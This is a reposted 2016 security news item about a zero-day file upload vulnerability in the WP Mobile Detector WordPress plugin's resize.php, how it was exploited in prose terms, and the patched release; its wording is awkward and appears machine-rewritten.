Wednesday, June 8, 2016

WordPress Websites Being Assaulted Through Fresh 0-Day within Plugin for WP Mobile Detector

Security patch was issued for certain WordPress plugin on 2nd June, 2016 after nearly a week when reports emerged about public assaults exploiting a zero-day flaw.

When the public assaults started, the WP Mobile Detector had to be withdrawn from the Plugin Directory of WordPress. However, on the 2nd, it was reinstated with end-users being advised towards upgrading to the 3.7 edition without delay. The function of the plugin is to identify whether certain WordPress website visitor has a smart-phone in use so one suitable theme can be delivered to the device.

The group working for Plugin Vulnerabilities just found that there is a flaw in the plugin which through exploitation enables uploading of an arbitrary file; the flaw is within a file in the plugin namely "/wp-content/plugins/wp-mobile-detector/resize.php."

The particular file deals with graphic uploads which researchers state after detecting the vulnerability that there's absence of primary input filtering by the file, letting an attacker leverage some malevolent file which gets included into /cache directory of the plugin.

As per Plugin Vulnerabilities, it is hard to have exploits for the 0-day as there is need for enabling an option marked allow_url_fopen, which isn't a default configuration.

Within one advisory, Plugin Vulnerabilities stated that because an enabled allow_url_fopen could result in the above kind of problem it appeared as if that wasn't enabled at most services of web-hosting. Threatpost.com posted this dated June 3, 2016.

It's extremely simple to exploit the vulnerability. An attacker just requires making one request to timthumb.php else resize.php within plugin directory which has an URL containing backdoor.

It is essential for users who're utilizing this plugin to get rid of it from their systems and replace it with a suitable one.

After the plugin developers have provided a fix to the problem followed with reinstating the plugin it's i mportant that users revise to any of the two versions 3.6 else 3.7 that are both free from assaults abusing the flaw.

The 0-day in WP Mobile Detector is exploitable irrespective of the graphic processing store the server has, therefore, any linkage with the ImageTragick security flaw is absent.

» SPAMfighter News - 09-06-2016


Source: WordPress Websites Being Assaulted Through Fresh 0-Day within Plugin for WP Mobile Detector

No comments:

Post a Comment